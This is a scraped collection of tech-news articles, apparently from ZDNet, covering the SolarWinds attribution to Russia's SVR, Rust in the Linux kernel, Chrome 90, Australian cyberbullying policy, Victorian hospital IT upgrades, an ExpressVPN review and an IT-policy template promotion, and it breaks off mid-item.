Information Technology

Hackers working for the Russian foreign intelligence service are behind the SolarWinds attack, cyber espionage campaigns targeting Covid-19 research facilities and more, according to the United States and the United Kingdom. The US accusation comes in a joint advisory by the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI), which also describes ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities in VPN services. The UK has also attributed the attacks to the Russian intelligence service.   The supply chain attacks targeting IT management software company SolarWinds represented one of the biggest cybersecurity incidents in recent years, with hackers gaining access to the networks of tens of thousands of organisations around the world, including several US government agencies, as well as cybersecurity companies including FireEye and Mimecast. Now the US has publicly attributed the SolarWinds attacks to Russian Foreign Intelligence Service (SVR) actors — also known as APT29, Cozy Bear, and The Dukes by cybersecurity researchers — along with additional campaigns, including malware attacks targeting facilities behind Covid-19 vaccine development. The five vulnerabilities being targeted by cyber attackers are: Security patches are available to fix each of the vulnerabilities and organisations yet to apply them to their network are urged to do so as soon as possible in order to prevent further attacks.

SEE: The best free VPNs: Why they don’t exist  “NSA, CISA, and FBI strongly encourage all cybersecurity stakeholders to check their networks for indicators of compromise related to all five vulnerabilities and the techniques detailed in the advisory and to urgently implement associated mitigations,” said the cybersecurity advisory. Sanctions The attribution of the SolarWinds attack comes as the Biden administration issued sanctions against Russia in response to what’s described as “harmful activities by the Government of the Russian Federation”. The financial sanctions specifically mention “malicious” cyber activities by Russian actors, including the SolarWinds cyber attack.   The UK has also called out the attacks targeting SolarWinds, and is urging organisations to take note, with the National Cyber Security Centre (NCSC)  assessing that it’s highly likely the SVR was responsible for gaining unauthorised access to SolarWinds ‘Orion’ software. “The UK and US are calling out Russia’s malicious behaviour, to enable our international partners and businesses at home to better defend and prepare themselves against this kind of action,” said Foreign Secretary Dominic Raab.   A recent alert by the UK’s National Cyber Security Centre (NCSC) warned users who hadn’t yet applied the security patch to the Fortinet FortiGate vulnerability — which was released in 2019 —  to assume their network has been compromised by cyber attackers and to take the appropriate action necessary.

MORE ON CYBERSECURITY More

After bringing support for the systems programming language Rust to Android, Google is now looking to bring it to the Linux kernel to reduce security flaws. As Google explained last month, Rust — a language that emerged from Mozilla — provides memory safety guarantees to the Android operating system, which has historically been written in C and C++. Google is targeting Rust at new Android code, rather than rewriting the millions of lines of existing code in Rust.

Now it’s time to move onto the Linux kernel that underlies Android. As ZDNet’s open source authority Steven J. Vaughan-Nichols reported last month, Linux kernel developers think it makes sense to write new parts of the kernel in Rust rather than rewriting the entire Linux kernel, which contains over 30 million lines of code largely written in C. SEE: 10 ways to prevent developer burnout (free PDF) (TechRepublic) “We feel that Rust is now ready to join C as a practical language for implementing the kernel. It can help us reduce the number of potential bugs and security vulnerabilities in privileged code while playing nicely with the core kernel and preserving its performance characteristics,” explains Wedson Almeida Filho of Google’s Android Team. Filho notes that the density of memory safety bugs in the Linux kernel is quite low. However, when they do occur, the Android security team generally considers them high-severity flaws. To show where Rust can benefit Linux kernel developers, Google has developed an example driver called ‘semaphore’. 

“How Rust can assist the developer is the aspect that we’d like to emphasize,” notes Filho. “For example, at compile time it allows us to eliminate or greatly reduce the chances of introducing classes of bugs, while at the same time remaining flexible and having minimal overhead.” Linux kernel developer Miguel Ojeda this week released a request for comments (RFC) to the Linux mailing list outlining a proposal for a second language in the kernel along with several patches for the Linux kernel written in Rust.  Ojeda also set up the Rust for Linux group, which Google’s Android Team has also joined.  “We know there are huge costs and risks in introducing a new main language in the kernel. We risk dividing efforts and we increase the knowledge required to contribute to some parts of the kernel,” writes Ojeda. “Most importantly, any new language introduced means any module written in that language will be way harder to replace later on if the support for the new language gets dropped. Nevertheless, we believe that, even today, the advantages of using Rust outweighs the cost.” SEE: Developer: Rust programming language is being used for bigger projects As noted by Phoronix, Linux kernel creator Linus Torvalds has already raised some concerns with Rust, although he also said that “on the whole I don’t hate it.” However, Torvalds added that “the ‘run-time failure panic’ is a fundamental issue”. Filho explained that, since Rust is new to the kernel, there is an opportunity to improve processes and documentation.  “For example, we have specific machine-checked requirements around the usage of unsafe code: for every unsafe function, the developer must document the requirements that need to be satisfied by callers to ensure that its usage is safe; additionally, for every call to unsafe functions (or usage of unsafe constructs like dereferencing a raw pointer), the developer must document the justification for why it is safe to do so,” writes Filho.  Rust, which only reached 1.0 in 2015, appears to be gaining traction with developers. AWS, Huawei, Google, Microsoft, and Mozilla are backing the Rust Foundation, which launched in February. It’s believed Shane Miller, AWS senior engineering manager, has been elected the first chairperson of the foundation. 

Open Source More

Google has just released Chrome version 90, bringing a privacy update that automatically adds HTTPS to a URL when it is available. Chrome engineers flagged the HTTPS feature in February and Google has been testing it in Chrome 90 previews in the Canary and Beta channels. Additionally, Chrome 90 blocks downloads from HTTP sources if the page URL is HTTPS.

Google explained in a blogpost last month that the HTTPS default should help when users type “example.com” instead of “https://example.com”. Chrome previously used http:// as the default protocol, but now defaults to https://. SEE: Security Awareness and Training policy (TechRepublic Premium) It should also speed up page loads, since Chrome connects directly to the HTTPS endpoint without needing to be redirected from http:// to https://. Chrome 90 also brings the first ‘on/off’ controls for Google’s Privacy Sandbox, which includes as part of its design Google’s controversial FLoC identifier replacement for third-party cookies that rival browsers Brave and Vivaldi have disabled.   “With the Chrome 90 release in April, we’ll be releasing the first controls for the Privacy Sandbox (first, a simple on/off), and we plan to expand on these controls in future Chrome releases, as more proposals reach the origin trial stage, and we receive more feedback from end users and industry,” Google announced in January. 

Besides these updates, Chrome 90 includes 37 security fixes. External researchers reported six high-severity issues, 10 medium-severity flaws, and three low-severity flaws. This release of Chrome also ships with the AV1 encoder with better support for WebRTC video-conferencing applications, like Duo, Meet, and Webex. Google notes that AV1 offers better screen-sharing capabilities than VP9 and other codecs. It also enables video for users on low-bandwidth networks, for example at 30kbps and lower. More

The federal government has said it is taking a comprehensive approach to cyberbullying by pursuing a range of measures, and considers that education, victim support, and civil avenues are just as important as recourse to criminal law to effectively address cyberbullying.The comments were made in its response to a report on the adequacy of existing cyberbullying laws tabled by the Senate Legal and Constitutional Affairs Committee on 28 March 2018.The report [PDF] made nine recommendations.Three years later, the government “supported in principle” five of them, “supported” a further three, and the remaining one was “noted”.The committee was charged with looking into the adequacy of existing offences in the Commonwealth Criminal Code and of state and territory criminal laws to capture cyberbullying. Among its recommendations was the request that social media platforms be held to more account by the Australian government than they were in 2018.In its response [PDF], the government focused on existing measures, and education, as being sufficient enough to tackle the issue of cyberbullying. “Early intervention measures such as education, harm minimisation, and encouraging the safe and responsible use of technology are proactive measures that can prevent cyberbullying conduct escalating to criminal behaviour and prevent or minimise the harm resulting from cyberbullying incidents,” it wrote.

“The targets of online abuse and bullying should not be forced offline. Instead, technology platforms, governments, and other users must all play a part in making the internet safe.”The government was asked by the committee to consult state and territory governments, non-government organisations, and other relevant parties with the goal of developing a clear definition of cyberbullying.In its response, it pointed to a definition decided on by the Council of Australian Governments (COAG) Bullying and Cyberbullying Senior Officials Working Group:Bullying is an ongoing and deliberate misuse of power in relationships through repeated verbal, physical and/or social behaviour that intends to cause physical, social and/or psychological harm. It can involve an individual or a group misusing their power, or perceived power, over one or more persons who feel unable to stop it from happening. Bullying can happen in person or online, via various digital platforms and devices and it can be obvious (overt) or hidden (covert). Bullying behaviour is repeated, or has the potential to be repeated, over time (for example, through sharing digital records). Bullying of any form or for any reason can have immediate, medium and long-term effects on those involved, including bystanders. Single incidents and conflict or fights between equals, whether in person or online, are not defined as bullying.The Working Group recommended this definition be used by all schools and promoted to relevant stakeholders, it said.The second recommendation asked the government to approach cyberbullying primarily as a social and public health issue. At the same time, it asked the government consider how it can further improve the quality and reach of preventative and early intervention measures, including education initiatives to reduce the incidence of cyberbullying among children and adults.The government pointed to the Keeping our Children Safe Online package overseen by the eSafety Commissioner as addressing this concern, as well as the Online Safety Act and a probe of the use of mobile devices in schools.Another recommendation made by the committee, and supported by the government, is the consideration of increasing the maximum penalty for using a carriage service to menace, harass, or cause offence under section 474.17 of the Criminal Code Act 1995 from three years’ imprisonment to five years’ imprisonment. The Online Safety Bill increases this threshold.”Cyberbullying, sexting, and other anti-social online behaviours are increasingly engaged in by children and young people. As a result, there is a risk that any new offences or penalties for cyberbullying will disproportionately apply to children, while not necessarily addressing the underlying causes of cyberbullying, or preventing the harm that it causes to victims,” the government wrote.”Criminal sanctions for minors, in particular, should generally be an option of last resort.”Further, it said Section 474.17 of the Criminal Code has been successfully applied to the prosecution of cyberbullying, including behaviour such as: Posting offensive and abusive comments on Facebook tribute pages of deceased children; sending taunting and abusive messages on social media, and posting photos on Instagram with offensive commentary concerning a victim; and, in the context of underage grooming, posting inappropriate commentary and manipulative and threatening comments on Facebook accounts of underage girls.The Australian House of Representatives last month agreed to the country’s new Online Safety Act that would hand the eSafety Commissioner powers to order the removal of material that seriously harms adults and hold platforms accountable to a set of yet to be determined basic online safety expectations.The Online Safety Bill 2021 contains six key priority areas: A cyberbullying scheme to remove material that is harmful to children; an adult cyber abuse scheme to remove material that seriously harms adults; an image-based abuse scheme to remove intimate images that have been shared without consent; basic online safety expectations for the eSafety Commissioner to hold services accountable; an online content scheme for the removal of “harmful” material through take-down powers; and an abhorrent violent material blocking scheme to block websites hosting abhorrent violent material. Waved through simultaneously, the Online Safety (Transitional Provisions and Consequential Amendments) Bill 2021, meanwhile, repeals the Enhancing Online Safety Act 2015 upon commencement of the new Online Safety ActThe Bill was given the nod despite testimony from tech companies and civil liberties groups that the legislation was “rushed”.IF YOU OR ANYONE YOU KNOW IN AUSTRALIA NEEDS HELP CONTACT ONE OF THESE SERVICES:Suicide Call Back Service on 1300 659 467Lifeline on 13 11 14Kids Helpline on 1800 551 800MensLine Australia on 1300 789 978Beyond Blue on 1300 22 46 36Headspace on 1800 650 890QLife on 1800 184 527MORE ON THE NEW SAFETY BILL More

Image: Getty Images
The Victorian government plans to invest a total of AU$30 million to upgrade and modernise the IT infrastructure of 28 of the state’s hospitals and health services in a bid to guard against further cyber attacks.The AU$30 million will be divided amongst hospitals across Melbourne and regional and rural health services. Melbourne hospitals will receive a majority share of nearly AU$22 million, while the remaining AU$8 million will be split between regional and rural health services. To be delivered as part of the state government’s Clinical Technology Refresh program, the funding will be used specifically to replace older servers and operating systems with new infrastructure. The state government touted the new infrastructure will reduce IT outages, improve network speed, support the rollout of Wi-Fi at the bedside of patients, as well as enable the loading and viewing of high resolution medical imaging, telehealth, and access to clinical support and pathology results from other hospitals. “We are helping hospitals and health services across Victoria upgrade computers and IT infrastructure to strengthen reliability and cybersecurity,” Victorian Minister for Health Martin Foley said. “This is about protecting our health services from cyber attacks.”Last month, surgeries operated by Eastern Health in Victoria were forced to cancel some patient appointments after experiencing a “cyber incident”. Eastern Health operates the Angliss, Box Hill, Healesville, and Maroondah hospitals, and has many more facilities under management.

In a statement, Eastern Health said it took many of its systems offline in response to the incident.”Many Eastern Health IT systems have been taken off-line as a precaution while we seek to understand and rectify the situation,” it said.”It is important to note, patient safety has not been compromised.”Back in 2019, a similar incident affecting Victoria’s hospitals occurred, which resulted in them disconnecting themselves from the internet in an attempt to quarantine a ransomware infection. At the time, the Victorian Department of Premier and Cabinet revealed the impacted hospitals were in the Gippsland Health Alliance and the South West Alliance of Rural Health.The incident occurred shortly after the Victorian Auditor-General’s Office (VAGO) labelled the state’s public health system as highly vulnerable to cyber attacks, with a report flagging that security weaknesses within the Department of Health and Human Services’ (DHHS) own technology arm are increasing the likelihood of a breach in 61% of the state’s health services.”There are key weaknesses in health services’ physical security, and in their logical security, which covers password management and other user access controls,” VAGO wrote. “Staff awareness of data security is low, which increases the likelihood of success of social engineering techniques such as phishing or tailgating into corporate areas where ICT infrastructure and servers may be located.”In its audit, VAGO probed three health providers — Barwon Health, the Royal Children’s Hospital, and the Royal Victorian Eye and Ear Hospital — and examined how two different areas of the DHHS — the Digital Health branch and Health Technology Solution — provide health services in the state.In probing the health services, VAGO said it was also able to access accounts, including admin ones, using “basic hacking tools”. The accounts had weak passwords and no MFA.”All the audited health services need to do more to protect patient data,” the report said. “We also found that health services do not have appropriate governance and policy frameworks to support data security.”Related Coverage More

ExpressVPN is a popular VPN that’s easy to set up and easy to use. Oddly enough, though, it’s not much of a standout. Compared to other recommended VPN services, pricing is middle of the road, as are performance and features.

Locations: 160Countries: 94Simultaneous connections: 5Kill switch: yesLogging: noPrice: $12.95/month, or 12 months for $99.95Trial: 30-day refund guaranteeSupported platforms: iOS, Android, MacOS, Windows, Linux, game consoles, smart TVs, routers

View Now at ExpressVPN

I tried to find out exactly how many servers and IP addresses ExpressVPN has – since other VPN providers tout their numbers. Unfortunately, all the company told me (which is probably more honest and transparent than their stat-driven competitors) was this:The one place where ExpressVPN does stand out is in its vast number of client implementations. Whatever computing device you have – be it mobile, tablet, laptop or desktop of any OS flavor – ExpressVPN offers a version for your platform. Choosing a fast server connection When I evaluate a VPN, I avoid the big “Connect” button for a while after install. I’m usually far more curious about the various options and settings. In the case of ExpressVPN, I found an option under the “hamburger” menu that I like right away. This isn’t a point-to-point speed test like Fast.com or Speedtest.net. This is a test of all (or a subset) ExpressVPNs servers from your location. It took about five minutes, but it was worth the wait. ExpressVPN scans across all their servers to show which were faster in terms of both download speed and latency. Plus, it adds a speed index to tell you which server is faster overall. For me, here in Oregon, it was no surprise that a West Coast server was the fastest overall. It’s also possible to see servers in different countries and how they stack up.

This is a relatively simple and obvious feature. It’s a wonder more VPN providers don’t offer it. More connection options By default, ExpressVPN provides a very simple startup screen. Just hit the magic button and it will assign you to a server it recommends. Because I live in the Pacific Northwest, Seattle is an obvious choice for location. Many users will prefer to choose a location to connect. The ExpressVPN connection screen is clean and clear. You can choose from one of the recommended locations, as this screen shows. You can also browse through all locations. Or you can use the search bar to quickly pick a destination server at a desired location. The application allows you to set servers as favorites, so if you have a few you regularly return to, they’re easy to find. Settings and options The hamburger menu also provides access to ExpressVPN’s options screens. The General tab provides some insight into the capabilities ExpressVPN offers. While not a particularly unique feature, the fact that you can open the VPN on Windows startup and connect to the last used location when the app launches means that you can set up a default behavior to connect to a VPN as soon as your computer boots up. The app also supports a kill switch option, which you can enable or disable, as well as providing access to local devices like printers while connected to a remote server. It allows for traffic sculpting, too, enabling you to use the VPN for certain apps and not for other apps. This is a key feature if you want VPN protection or location translation for some connections, but want to use the full power and speed of your connection for other applications. The protocol setting screen has a lot of options for protocol geeks. You’re probably best just leaving it on Automatic unless you know what you’re doing or have a very specific preference. The Shortcuts tab simply lets you put a few web addresses on the main screen. The Browsers tab allows you to control the connection directly from a browser extension. Right now, it supports Chrome and Firefox. Edge is not supported. Finally, let’s look at the Advanced tab. ExpressVPN does allow you to share telemetry back to the company, but that option is properly disabled by default. You can eliminate IPv6 detection, a feature most will leave on. It’s always nice to optimize Windows networking. But the option that interests me most is the option to only use ExpressVPN DNS servers. Since a lot of leakage comes via DNS, it’s interesting that ExpressVPN is locking connections to their servers. Let’s see how well that works for them. Performance testing I installed the ExpressVPN application on a fresh, fully-updated Windows 10 install. To do this kind of testing, I always use a fresh install so some other company’s VPN leftovers aren’t clogging up the system and possibly influencing results. I have a 1Gb fiber feed, so my baseline network speed is rockin’ fast. To provide a fair US performance comparison, rather than comparing to my local fiber broadband provider, I used speedtest.net and picked a Comcast server in Chicago to test download speed. For each test, I connected to each server three times. The number shown below is the average result of the three connections. In looking at these numbers, it’s possible to get carried away by the difference in the baseline speed compared to the VPN speed. That’s not the best measurement, mostly because I have broadband over fiber so my connection speed is extremely high. Also, if you look at the baseline speeds between my reviews, you may notice that they differ considerably going to the same cities. Keep in mind that speed tests are entirely dependent on the performance of all the links between the two locations, and that also includes the time of day, how active those servers are, and how slow or fast the internet is on a given day. Normally, I include a connection to Russia among my tests. But because ExpressVPN does not have a server presence in Russia, I was unable to test performance to Rossiyskaya Federatsiya. Here are the results of my tests: Speed Test Server Baseline download speed without VPN (higher is better) Ping speed without VPN (lower is better) Time to connect to VPN Download speed with VPN (higher is better) Ping speed with VPN (lower is better) Leaks Dallas – CenturyLink 237.8Mbps 57ms 7.41 sec 118.17Mbps 101ms No Stockholm, Sweden – RETN 217.75Mbps 176ms 7.45 sec 114.91Mbps 179ms Somewhat Taipei, Taiwan – Taiwan Mobile 455.82Mbps 145ms 8.12 sec 123.73Mbps 172ms Somewhat Perth, Australia – Telstra 180.57Mbps 222ms 7.53 sec 97.83Mbps 223ms No Hyderabad, India – Excitel 366.59Mbps 244ms 7.92 sec 82.88Mbps 244ms No When you use a VPN service, it’s natural for performance to drop. After all, you’re running all your packets through an entirely artificial infrastructure designed to hide your path. The real numbers you should look at are the download speed and the ping speed. Are they high enough to do the work you need to do? For all connections, ExpressVPN was…meh. It wasn’t unusable, but it wasn’t stellar, either. That said, all VPN-based connection speeds were more than enough for almost all kinds of video, so it really was good enough. Ping speeds, on the other hand, were too slow to allow any sort of gaming where responsiveness is required. Ping speed is an indication of how quickly a response gets back after a network request is sent from your computer. The lag limitations here are due to actual physics. If you’re sending a packet across the planet, it will take longer to hear back than if you’re sending a packet across town. Security There are many different ways a VPN can fail you when it comes to security. But one of the most troublesome is when it reveals you as a potentially untrustworthy user. DNSLeak.com and dnsleaktest.com both identified my international connections as possible DNS leaks. This is not the case, because all of them (like the one below for Stockholm) showed the VPN-connected city, rather than my location here in Oregon. But there was another problem. Note that both DNS testing services identified my connection as coming from Security Firewall Ltd. No, that’s not ExpressVPN. But then, there’s this: Yeah, if I were running a site and I was concerned about fraud or VPN usage, I’d block these guys. And so, if your connection appears to be coming from such a concerning set of IPs, I’d call this a security connection fail. Security Firewall Ltd was identified for not just my Sweden connection, but for my Taiwan connection as well.  So if you’re using servers in Sweden and Taiwan and sites you’re connecting to either don’t allow a connection or make usage difficult, you’ll know it’s because, by virtue of your connection through Security Firewall Ltd, you’re considered a potentially troublesome user. Special.

I didn’t see this problem universally. When connecting to Australia, the DNS identified ServersAustralia as the ISP. When testing a connection to India, the ISP was identified as Host1Plus. Both have relatively benign reputations. It’s weird, though, unless ExpressVPN simply didn’t know about Security Firewall Ltd’s bad Google juice. I would have thought that since ExpressVPN is providing its own DNS, it would have changed up DNS entries for providers that have a tarnished reputation.

What are the pros and cons of ExpressVPN?

Pros:clean user interfaceeasy to set upthat great performance scan across all serversenormous library of device supportCons:relatively higher price than competitorsnon-standout performance and featuresthat weird Security Firewall Ltd thing  

The bottom line I like ExpressVPN, I do. It’s a breeze to set up and configure. I like how you can determine server speed across the entire network. And searching, saving, and configuring locations is dead simple. But there are a few things that might hold this product back versus its competitors. It’s more expensive than many. That’s not to say it’s wildly overpriced. But at $99 a year, it’s going to have trouble holding its own against those with cheaper plans. Performance was also not standout. Like I said above, it’s good enough for video, so performance really is good enough to get the job done. It’s just not a wow — except in the ping sense. There, it’s wow, pings take soooo long. Connection speed wasn’t annoying either. But then there’s that connection to Security Firewall Ltd. You never want an account to be associated with high fraud risk ISPs or IP addresses. Also, if you’re trying to hide the fact that you’re using a VPN, this might not do it. So, let’s use my two-criteria metric on ExpressVPN: If you’re counting on this VPN to protect your life: Don’t use it.If you’re counting on this VPN to protect coffee shop surfing: Sure, it’s fine.And there you go. There’s nothing really standout about ExpressVPN, but it’s fine. I’d use it when out and about, sipping my peanut butter mocha. Mmm. Peanut butter mocha…You can follow my day-to-day project updates on social media. Be sure to follow me on Twitter at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, and on YouTube at YouTube.com/DavidGewirtzTV.

ZDNet Recommends More

Whether you’re writing corporate policies for business workers or university policies for faculty and staff, crafting an effective IT policy can be a daunting and expensive task. You could spend hours writing a policies and procedures manual yourself, but consider how much your time is worth. According to job site Glassdoor, the average salary of an IT Director in the U.S. is over $140,000 (depending on geographic location, company, education, etc.). Over a year, that salary breaks down to about $67 per hour. If it takes you one work day to write an IT policy, that single policy cost you $536 ($67 x 8 hours). Don’t have time to write a business or university policy? You can pay a consultant hundreds of dollars to create one for you, but there’s a better way. Download a policy template from TechRepublic Premium. For less than what it would cost to create a single policy, TechRepublic Premium subscribers get access to over 100 ready-made IT policies. Just need one or two policies? We’ve got you covered. You can also purchase individual technology policies if that’s all you need. Once you download one of our information technology policy templates, you can customize it to fit your company’s needs. Here’s a sample of the types of policies in our library. IT security policies Security incident response policy: The Security Incident Response Policy describes the organization’s process for minimizing and mitigating the results of an information technology security-related incident, such as a data breach, malware infection, insider breach, distributed denial of service attack (DDoS attack) and even equipment loss or theft. The policy’s purpose is to define for employees, IT department staff and users the process to be followed when experiencing an IT-security incident. Data encryption policy: The policy’s purpose is to define for employees, computer users and IT department staff the encryption requirements to be used on all computer, device, desktop, laptop, server, network storage and storage area network disks and drives that access or store organization information to prevent unauthorized access to organization communications, email, records, files, databases, application data and other material.

Information security policy: From sales reports to employee social security numbers, IT is tasked with protecting your organisation’s private and confidential data. To accomplish this, you need to define acceptable and unacceptable use of systems and identify responsibilities for employees, information technology staff, and supervisors/managers. This policy offers a comprehensive outline for establishing standards, rules and guidelines to secure your company’s sensitive data. VPN usage policy: Using a VPN to access internal resources comes with responsibilities to uphold network security, as well as to safely and equitably use company information resources. This policy will help you enforce security standards when it comes to VPN use. Password management policy: Employee passwords are the first line of defense in securing the organization from inappropriate or malicious access to data and services.  Password-driven security may not be the perfect solution, but the alternatives haven’t gained much traction. This password policy defines best practices that will make password protection as strong and manageable as possible. Mobile device security policy: More and more users are conducting business on mobile devices. This can be due to increases in remote workers, travel, global workforces, or just being on-the-go. This policy provides guidelines for mobile device security needs in order to protect businesses and their employees from security threats. Identity theft protection policy: Help protect your employees and customers from identity theft. This policy outlines precautions for reducing risk, signs to watch out for, and steps to take if you suspect identity theft has occurred. Remote access policy: This policy outlines guidelines and processes for requesting, obtaining, using, and terminating remote access to organization networks, systems, and data. User privilege policy: This policy provides guidelines for the delegation of user privileges on organization-owned systems and guidance for high-privilege and administrator accounts. Perimeter security policy: While security principles should apply throughout the organization, locking down the perimeter and ensuring only necessary connections get through is an especially critical goal. This policy provides guidelines for securing your organization’s network perimeter from potential vulnerabilities. Security awareness and training policy: A security policy is only as valuable as the knowledge and efforts of those who adhere to it, whether IT staff or regular users. This policy is designed to help your information technology staff guide employees toward understanding and adhering to best security practices that are relevant to their job responsibilities and avoid a potential security incident. IT emergency response and disaster recovery policies Disaster recovery policy and business continuity plan: Natural and man-made disasters can jeopardize the operations and future of any company, so it’s critical to develop a plan to help ensure ongoing business processes in a crisis. This download explains what needs to go into your DR/BC plan to help your organization prepare for-and recover from-a potential disaster. Severe weather and emergency policy: This policy template offers guidelines for responding to severe weather activity and other emergencies. The download includes both a PDF version and an RTF document to make customization easier. Resource and data recovery policy: All employees should be familiar with the processes for recovering information if it becomes lost, inaccessible, or compromised. This policy provides guidelines for the recovery of data from company-owned or company-purchased resources, equipment, and/or services. Incident response policy: Whether initiated with criminal intent or not, unauthorized access to an enterprise network or campus network is an all too common occurrence. Every enterprise needs to establish a plan of action to assess and then recover from unauthorized access to its network. This policy provides a foundation from which to start building your specific procedures. IT personnel policies Contract work policy: It’s common practice for companies to leverage contractors in order to offload work to specialized individuals or reduce costs associated with certain tasks and responsibilities. Our Contract work policy can help your company establish guidelines for retaining, overseeing and terminating contracts including orientation, access and role determinations and business considerations. IT training policy: Successful IT departments are defined not only by the technology they deploy and manage, but by the skills and capabilities of their people. This IT training policy is designed to help workers identify training options that fit within their overall career development track and get the necessary approvals for enrollment and reimbursement. Employee Performance Review Policy: A good performance review emphasizes the positives and seeks to turn weak areas into measurable goals to strengthen employee abilities and adherence to job responsibilities. It also solicits input from employees to address any issues or concerns they may have with their role at the company. TechRepublic Premium’s Performance Review Policy and the accompanying review template can help you answer these questions and implement fair, effective and comprehensive reviews for your staff. Third party vendor policy: Many businesses rely on outside companies, known as third party organizations, to handle their data or services.This policy provides guidelines for establishing qualified third party vendors with whom to do business and what requirements or regulations should be imposed upon their operational processes. Moonlighting policy: Moonlighting, is especially frequent in technology where people with varying skills and backgrounds may find their abilities in demand by multiple companies. This policy provides guidelines for permissible employee moonlighting practices to establish expectations for both workers and organizations. Drug and alcohol abuse policy: This policy provides a working framework for establishing rules and procedures that prohibit drug and alcohol use on company premises or in company vehicles.  Employee non-compete agreement: Don’t let your valuable corporate assets, proprietary information, or intellectual property walk out the door when an employee leaves the company. Workplace safety policy: This policy will help ensure that your company facilities are safe for all employees, visitors, contractors, and customers.  Severance Policy: The Severance Policy outlines the differences between simple departure scenarios where the employee is paid a final check for the time they worked and any unused vacation hours, as well as more complex situations. Interviewing guidelines policy: This policy will help organizations conduct useful and appropriate interviews with potential new hires, both from a proper methodology perspective and a legal standpoint. Employee objectives policy: Defining objectives is a prime way to motivate employees, giving them tangible proof of their accomplishments, their progress, and their contributions to the business. However, it’s important to follow certain guidelines to provide an effective framework for establishing objectives, monitoring them, and helping employees complete them. Personnel screening policy: This policy provides guidelines for screening employment candidates, either as full-time or part-time employees, or contingent workers, including temporary, volunteer, intern, contract, consultant, offshore, or 1099 workers) for high-risk roles. It aims to ensure that candidates meet regulatory and circumstantial requirements for employment. Telecommuting policy: This policy describes the organization’s processes for requesting, obtaining, using, and terminating access to organization networks, systems, and data for the purpose of enabling staff members to regularly work remotely on a formal basis. IT staff systems/data access policy: IT pros typically have access to company servers, network devices, and data so they can perform their jobs. However, that access entails risk, including exposure of confidential information and interruption in essential business services. This policy offers guidelines for governing access to critical systems and confidential data. Ergonomics policy: A safe and healthy work environment provides the foundation for all employees to be at their most productive. Not only does it promote productivity in the workforce, it also helps prevent accidents, lawsuits, and in extreme cases, serious injury and potentially loss of life. This policy establishes procedures to help ensure a safe, ergonomically healthy environment. IT asset management policies IT Hardware inventory policy: This policy describes guidelines your organization can follow to track, process, and decommission IT equipment. Asset control policy: This customizable policy template includes procedures and protocols for supporting effective organizational asset management specifically focused on electronic devices. IT hardware procurement policy: A strong hardware procurement policy will ensure that requirements are followed and that all purchases are subject to the same screening and approval processes. BYOD Policy: Our BYOD (Bring Your Own Device) Policy describes the steps your employees must take when connecting personal devices to the organization’s systems and networks. Home usage of company-owned equipment policy: Employees who work from home often use company-supplied systems and devices, which helps ensure that they have consistent, state-of-the-art equipment to do their work. However, organizations should provide usage guidelines, such as this policy, covering the responsibilities of IT staff and employees. Hardware decommissioning policy: When decommissioning hardware, standard and well-documented practices are critical. The steps outlined in this policy will guide your staff methodically through the process. Assets won’t be unnecessarily wasted or placed in the wrong hands, data stored on this hardware will be preserved as needed (or securely purged), and all ancillary information regarding hardware (asset tags, location, status, etc.) will be updated. Acceptable Use Policy: Equipment: Employees rely on IT to provide the equipment they need to get things done. This policy template assists in directing employees to use that equipment safely and within organizational guidelines. IT software management policies Software usage policy: This policy is designed to help companies specify the applications that are allowed for installation and use on computer systems and mobile devices systems owned by the organization. It also covers the appropriate usage of these applications by company employees and support staff. Development lifecycle policy: Software development is a complex process which involves a specific series of steps (known as the development lifecycle) to transform a concept into a deliverable product. The purpose of this policy is to provide guidelines for establishing and following a development lifecycle system. Patch management policy: A comprehensive patching strategy is a must in order to reap the benefits, however a willy-nilly approach can result in unexpected downtime, dissatisfied users and even more technical support headaches. This policy provides guidelines for the appropriate application of patches. Artificial intelligence ethics policy: Artificial intelligence has the power to help businesses as well as employees by providing greater data insights, better threat protection, more efficient automation and other advances. However, if misused, artificial intelligence can be a detriment to individuals, organizations, and society overall. This policy offers guidelines for the appropriate use of and ethics involving artificial Intelligence. Scheduled downtime policy: IT departments must regularly perform maintenance, upgrades, and other service on the organization’s servers, systems, and networks. Communicating scheduled downtime in advance to the proper contacts helps ensure that routine maintenance and service tasks do not surprise other departments or staff, and it enables others within the organization to prepare and plan accordingly. Internet and email usage policy: This policy sets forth guidelines for the use of the internet, as well as internet-powered electronic communications services, including email, proprietary group messaging services (e.g., Slack), and social networking services (e.g., Facebook, Twitter) in business contexts. It also covers Internet of Things (IoT) use, and bring-your-own-device (BYOD) practices. Virtualization policy: Virtualization platforms are available from a number of vendors, but it’s still critical to maintain your virtualization environment to avoid unnecessary resource consumption, out of-compliance systems or applications, data loss, security breaches, and other negative outcomes. This policy defines responsibilities for both end users and the IT department to ensure that the virtualized resources are deployed and maintained effectively. Machine automation policy guidelines: Many industries rely on machine automation implementations to save money and reduce risk. However, along with the benefits comes the critical need to implement policies for its proper use. This set of guidelines will help your organization keep its machine automation safe, reliable, and in compliance. Software automation policy guidelines: Software automation is used for many business and IT processes, depending on industry vertical and individual company business and IT needs. Because this automation is far-reaching, policy considerations touch on many areas. This set of guidelines will help you cover all the bases as you build a comprehensive software automation policy. About TechRepublic Premium TechRepublic Premium solves your toughest IT issues and helps jumpstart your career or next project. Complex tech topics are distilled into concise, yet comprehensive primers that keep you (and your CEO, CFO, and boardroom) ahead of the curve. Save time and effort with our ready-made policies, templates, lunch-and-learn presentations, and return-on-investment calculators. We have the information, documents, and tools every IT department needs – from the enterprise business unit to the one-person shop – all in one place. More

Cyber criminals are targeting vulnerable Microsoft Exchange servers with cryptocurrency mining malware in a campaign designed to secretly use the processing power of compromised systems to make money.  Zero-day vulnerabilities in Microsoft Exchange Server were detailed last month when Microsoft released critical security updates to prevent the exploitation of vulnerable systems.

Exchange attacks

